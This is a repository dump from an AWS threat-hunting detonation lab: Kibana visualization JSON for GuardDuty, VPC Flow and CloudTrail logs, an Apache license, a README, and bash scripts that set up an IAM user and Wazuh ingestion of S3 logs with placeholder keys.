Bytes\"},\"drawLinesBetweenPoints\":true,\"interpolate\":\"linear\",\"mode\":\"stacked\",\"show\":\"true\",\"showCircles\":true,\"type\":\"area\",\"valueAxis\":\"ValueAxis-1\"}],\"times\":[],\"type\":\"area\",\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"labels\":{\"filter\":false,\"rotate\":0,\"show\":true,\"truncate\":100},\"name\":\"LeftAxis-1\",\"position\":\"left\",\"scale\":{\"defaultYExtents\":false,\"mode\":\"normal\",\"setYExtents\":false,\"type\":\"linear\"},\"show\":true,\"style\":{},\"title\":{\"text\":\"Overall Sum of Bytes\"},\"type\":\"value\"}]},\"title\":\"VPCFlow-SumOfBytesOverTime-histogram\",\"type\":\"area\"}", 94 | "uiStateJSON": "{}", 95 | "description": "", 96 | "version": 1, 97 | "kibanaSavedObjectMeta": { 98 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"lucene\"}}" 99 | } 100 | } 101 | }, 102 | { 103 | "id": "cb77bf40-a541-11e8-846b-5b38848342c8", 104 | "type": "visualization", 105 | "attributes": { 106 | "title": "VPCFlow-Top10ExternalDestinationPort-Table", 107 | "visState": "{\"title\":\"VPCFlow-Top10ExternalDestinationPort-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showMeticsAtAllLevels\":false,\"showPartialRows\":false,\"showTotal\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstport\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 External Destination Port\"}}]}", 108 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 109 | "description": "", 110 | "version": 1, 111 | "kibanaSavedObjectMeta": { 112 | "searchSourceJSON": 
"{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"NOT (data.aws.dstaddr: \\\"10.0.0.0/8\\\" OR data.aws.dstaddr: \\\"172.16.0.0/12\\\" OR data.aws.dstaddr: \\\"192.168.0.0/16\\\")\"}}" 113 | } 114 | } 115 | }, 116 | { 117 | "id": "70762330-a54f-11e8-846b-5b38848342c8", 118 | "type": "visualization", 119 | "attributes": { 120 | "title": "GuardDuty-MostCommonAccountID-Table", 121 | "visState": "{\"title\":\"GuardDuty-MostCommonAccountID-Table\",\"type\":\"table\",\"params\":{\"perPage\":5,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.accountId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Account ID\"}}]}", 122 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 123 | "description": "", 124 | "version": 1, 125 | "kibanaSavedObjectMeta": { 126 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"kuery\"}}" 127 | } 128 | } 129 | }, 130 | { 131 | "id": "cf4ecc00-a54e-11e8-846b-5b38848342c8", 132 | "type": "visualization", 133 | "attributes": { 134 | "title": "GuardDuty-Last5Findings-Table", 135 | "visState":
"{\"title\":\"GuardDuty-Last5Findings-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showMeticsAtAllLevels\":false,\"showPartialRows\":false,\"showTotal\":false,\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"},\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"top_hits\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"aggregate\":\"concat\",\"size\":1,\"sortField\":\"@timestamp\",\"sortOrder\":\"desc\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.title\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"_term\",\"customLabel\":\"Last 5 GuardDuty Findings\"}}]}", 136 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"}}}}", 137 | "description": "", 138 | "version": 1, 139 | "kibanaSavedObjectMeta": { 140 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"data.aws.source:guardduty\"}}" 141 | } 142 | } 143 | }, 144 | { 145 | "id": "47bf70b0-a552-11e8-846b-5b38848342c8", 146 | "type": "visualization", 147 | "attributes": { 148 | "title": "VPCFlow-TopTalkers-Pie", 149 | "visState": "{\"title\":\"VPCFlow-TopTalkers-Pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":false,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.interface_id\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"VPCFlow 
Top Talkers\"}}]}", 150 | "uiStateJSON": "{}", 151 | "description": "", 152 | "version": 1, 153 | "kibanaSavedObjectMeta": { 154 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source : \\\"vpc\\\"\",\"language\":\"kuery\"}}" 155 | } 156 | } 157 | }, 158 | { 159 | "id": "864e9ef0-a4b7-11e8-846b-5b38848342c8", 160 | "type": "visualization", 161 | "attributes": { 162 | "title": "CloudTrail-EventNames-pie", 163 | "visState": "{\"title\":\"CloudTrail-EventNames-pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.eventName\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"CloudTrailEventNames\"}}]}", 164 | "uiStateJSON": "{}", 165 | "description": "", 166 | "version": 1, 167 | "kibanaSavedObjectMeta": { 168 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"\"}}" 169 | } 170 | } 171 | }, 172 | { 173 | "id": "90d5fd80-a6fd-11e8-89d6-8101ba40c8df", 174 | "type": "visualization", 175 | "attributes": { 176 | "title": "GuardDuty-CountryOfOrigin-MAP", 177 | "visState": "{\"title\":\"GuardDuty-CountryOfOrigin-MAP\",\"type\":\"region_map\",\"params\":{\"legendPosition\":\"bottomright\",\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"selectedLayer\":{\"attribution\":\"
Made with NaturalEarth | Elastic Maps Service
\",\"name\":\"World Countries\",\"weight\":1,\"format\":{\"type\":\"geojson\"},\"url\":\"https://vector.maps.elastic.co/blob/5659313586569216?elastic_tile_service_tos=agree&my_app_version=6.3.2&license=3686161f-2f78-4c9f-aa49-6fb90996a3b3\",\"fields\":[{\"name\":\"iso2\",\"description\":\"Two letter abbreviation\"},{\"name\":\"name\",\"description\":\"Country name\"},{\"name\":\"iso3\",\"description\":\"Three letter abbreviation\"}],\"created_at\":\"2017-04-26T17:12:15.978370\",\"tags\":[],\"id\":5659313586569216,\"layerId\":\"elastic_maps_service.World Countries\"},\"selectedJoinField\":{\"name\":\"name\",\"description\":\"Country name\"},\"isDisplayWarning\":false,\"wms\":{\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"baseLayersAreLoaded\":{},\"tmsLayers\":[{\"id\":\"road_map\",\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.3.2&license=3686161f-2f78-4c9f-aa49-6fb90996a3b3\",\"minZoom\":0,\"maxZoom\":18,\"attribution\":\"
© OpenStreetMap contributors | Elastic Maps Service
\",\"subdomains\":[]}],\"selectedTmsLayer\":{\"id\":\"road_map\",\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.3.2&license=3686161f-2f78-4c9f-aa49-6fb90996a3b3\",\"minZoom\":0,\"maxZoom\":18,\"attribution\":\"
© OpenStreetMap contributors | Elastic Maps Service
\",\"subdomains\":[]}},\"mapZoom\":2,\"mapCenter\":[0,0],\"outlineWeight\":1,\"showAllShapes\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.service.action.portProbeAction.portProbeDetails.remoteIpDetails.country.countryName\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":100,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"CountryOfOrigin\"}}]}", 178 | "uiStateJSON": "{}", 179 | "description": "", 180 | "version": 1, 181 | "kibanaSavedObjectMeta": { 182 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"kuery\"}}" 183 | } 184 | } 185 | }, 186 | { 187 | "id": "b4f2abe0-a541-11e8-846b-5b38848342c8", 188 | "type": "visualization", 189 | "attributes": { 190 | "title": "VPCFlow-Top10InternalDestinationPort-Table", 191 | "visState": "{\"title\":\"VPCFlow-Top10InternalDestinationPort-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showMeticsAtAllLevels\":false,\"showPartialRows\":false,\"showTotal\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstport\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 Interal Destination Port\"}}]}", 192 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 193 | "description": "", 194 | "version": 1, 195 | "kibanaSavedObjectMeta": { 196 | "searchSourceJSON": 
"{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"data.aws.dstaddr: \\\"10.0.0.0/8\\\" OR data.aws.dstaddr: \\\"172.16.0.0/12\\\" OR data.aws.dstaddr: \\\"192.168.0.0/16\\\"\"}}" 197 | } 198 | } 199 | }, 200 | { 201 | "id": "b4666910-a54f-11e8-846b-5b38848342c8", 202 | "type": "visualization", 203 | "attributes": { 204 | "title": "GuardDuty-MostCommonInstanceID-Table", 205 | "visState": "{\"title\":\"GuardDuty-MostCommonInstanceID-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.resource.instanceDetails.instanceId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Instance ID\"}}]}", 206 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 207 | "description": "", 208 | "version": 1, 209 | "kibanaSavedObjectMeta": { 210 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"kuery\"}}" 211 | } 212 | } 213 | }, 214 | { 215 | "id": "c71b00a0-a709-11e8-89d6-8101ba40c8df", 216 | "type": "visualization", 217 | "attributes": { 218 | "title": "loggingSourcesFor-58.218.205.75", 219 | "visState":
"{\"title\":\"loggingSourcesFor-58.218.205.75\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.source\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"AWS Logging Sources\"}}]}", 220 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 221 | "description": "", 222 | "version": 1, 223 | "kibanaSavedObjectMeta": { 224 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"58.218.205.75\",\"language\":\"kuery\"}}" 225 | } 226 | } 227 | } 228 | ] 229 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. 
For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 
48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. 
Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AWS Detonation Lab 2 | 3 | These scripts can be used as a proof of concept to generate a detonation lab from a CloudFormation template. There are also scripts for adding Wazuh agents to the target systems, as well as scripts that generate attacks on them that will be seen by AWS logging systems such as GuardDuty, VPC Flow Logs, Route53 DNS, Macie, CloudTrail, and other systems. 4 | 5 | All of these logs can be configured to be sent to the Kibana instance running on the Wazuh server, for use in threat hunting and in incident investigation and response. 6 | 7 | This CloudFormation template and the GuardDuty alert generation scripts are based on the [GuardDuty-Tester.template](https://github.com/awslabs/amazon-guardduty-tester/blob/master/guardduty-tester.template), which uses AWS CloudFormation to create an isolated environment with a bastion host, a redTeam EC2 instance that you can ssh into, and two target EC2 instances.
8 | 9 | Then you can run [guardduty_tester.sh](https://github.com/awslabs/amazon-guardduty-tester/blob/master/guardduty_tester.sh) that starts interaction between the redTeam EC2 instance and the target Windows EC2 instance and the target Linux EC2 instance to simulate five types of common attacks that GuardDuty is built to detect and notify you about with generated findings. 10 | 11 | For more information please refer to the [wiki](https://github.com/sonofagl1tch/AWSDetonationLab/wiki) 12 | 13 | ## Thank you for your contributions 14 | 15 | Special thanks to [Marta](https://github.com/mgmacias95) and [Danny](https://github.com/randoh) for their contributions to this project. 16 | 17 | ## Video presentations using this project 18 | 19 | [Who Done It: Gaining Visibility and Accountability in the Cloud](https://youtu.be/x4OJx2M52iI) - SANS Threat Hunting Summit 2018 20 | -------------------------------------------------------------------------------- /SANs_ThreatHuntingSummit-Powerpoint/Storm-Troopers-ThreatHuntingInTheClouds.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/SANs_ThreatHuntingSummit-Powerpoint/Storm-Troopers-ThreatHuntingInTheClouds.pdf -------------------------------------------------------------------------------- /ThreatHuntingGuides/README.md: -------------------------------------------------------------------------------- 1 | place holder 2 | -------------------------------------------------------------------------------- /Wazuh-configurations/runOnAWSCLIHost/awsCLI-wazuh-configuration-cloudTrail.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #These are the changes required to the wazuh server configuration to allow for the ingestion of cloudTrail logs 3 | # this script assumes that you already setup cloudTrail and are sending logs to the s3 bucket 
"aws-detonatonlab-1234567890" 4 | # https://documentation.wazuh.com/current/amazon/installation.html#create-an-iam-user 5 | 6 | #https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_create.html 7 | #policy name: Access-s3-cloudTrail-wazuh (scoped to the single log bucket; DeleteObject is only needed because the Wazuh module is configured with remove_from_bucket) 8 | cat <<EOF > Access-s3-cloudTrail-wazuh.json 9 | { 10 | "Version": "2012-10-17", 11 | "Statement": [ 12 | { 13 | "Sid": "VisualEditor0", 14 | "Effect": "Allow", 15 | "Action": [ 16 | "s3:GetObject", 17 | "s3:ListBucket", 18 | "s3:DeleteObject" 19 | ], 20 | "Resource": [ 21 | "arn:aws:s3:::aws-detonatonlab-1234567890", 22 | "arn:aws:s3:::aws-detonatonlab-1234567890/*" 23 | ] 24 | } 25 | ] 26 | } 27 | EOF 28 | #create wazuh access policy to cloudTrail (the policy document must be passed as a file:// URL, not a bare path) 29 | ##https://docs.aws.amazon.com/cli/latest/reference/iam/create-policy.html 30 | aws iam create-policy --policy-name Access-s3-cloudTrail-wazuh --policy-document file://Access-s3-cloudTrail-wazuh.json 31 | 32 | 33 | #Create an IAM User 34 | #user name: wazuh-user 35 | aws iam create-user --user-name wazuh-user 36 | #the output contains the AccessKeyId and SecretAccessKey that go into the insert_access_key/insert_secret_key variables of the server script; it is the only time the secret is shown 37 | aws iam create-access-key --user-name wazuh-user 38 | #attach policy to user (replace 1234567890 with your account id; the policy name must match the one created above) 39 | aws iam attach-user-policy --policy-arn arn:aws:iam::1234567890:policy/Access-s3-cloudTrail-wazuh --user-name wazuh-user -------------------------------------------------------------------------------- /Wazuh-configurations/runOnWazuh/server-wazuh-configuration-cloudTrail.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #https://documentation.wazuh.com/current/amazon/installation.html#create-an-iam-user 3 | 4 | #variables (placeholders: use the access key created for wazuh-user) 5 | insert_access_key="1234567890" 6 | insert_secret_key="0987654321" 7 | #Installing dependencies 8 | #Pip (-y so the script runs unattended) 9 | yum install -y python-pip 10 | #Boto3 11 | pip install boto3 12 | 13 | #Plugin configuration 14 | #backup plugin config file 15 | cp /var/ossec/etc/ossec.conf /var/ossec/etc/ossec.conf.bk 16 | #overwrite old config file with new config (unquoted EOF so the $insert_* variables above are expanded into the file) 17 | cat <<EOF > /var/ossec/etc/ossec.conf 18 | 23 | 24 | 25 | 26 | yes 27 | yes
28 | no 29 | no 30 | no 31 | smtp.example.wazuh.com 32 | ossecm@example.wazuh.com 33 | recipient@example.wazuh.com 34 | 12 35 | 131072 36 | 37 | 38 | 39 | 3 40 | 12 41 | 42 | 43 | 44 | 45 | plain 46 | 47 | 48 | 49 | secure 50 | 1514 51 | udp 52 | 131072 53 | 54 | 55 | 56 | 57 | no 58 | yes 59 | yes 60 | yes 61 | yes 62 | yes 63 | yes 64 | yes 65 | yes 66 | 67 | 68 | 43200 69 | 70 | /var/ossec/etc/rootcheck/rootkit_files.txt 71 | /var/ossec/etc/rootcheck/rootkit_trojans.txt 72 | 73 | /var/ossec/etc/rootcheck/system_audit_rcl.txt 74 | /var/ossec/etc/rootcheck/system_audit_ssh.txt 75 | 76 | yes 77 | 78 | 79 | 80 | yes 81 | 1800 82 | 1d 83 | yes 84 | 85 | 86 | 87 | yes 88 | 1800 89 | 1d 90 | yes 91 | 92 | wodles/java 93 | wodles/ciscat 94 | 95 | 96 | 97 | 98 | yes 99 | yes 100 | /var/log/osquery/osqueryd.results.log 101 | /etc/osquery/osquery.conf 102 | yes 103 | 104 | 105 | 106 | 107 | no 108 | 1h 109 | yes 110 | yes 111 | yes 112 | yes 113 | yes 114 | yes 115 | yes 116 | 117 | 118 | 119 | yes 120 | 1m 121 | yes 122 | 123 | yes 124 | 1h 125 | 126 | 127 | yes 128 | 1h 129 | 130 | 131 | yes 132 | 1h 133 | 134 | 135 | 136 | 137 | no 138 | 10m 139 | yes 140 | yes 141 | 142 | detonationlab-v2-s3bucketcloudtrail-19gq8w59m8lcg 143 | $insert_access_key 144 | $insert_secret_key 145 | 146 | 147 | detonationlab-v2-s3bucketguardduty-1kn21uv4spg29 148 | firehose 149 | $insert_access_key 150 | 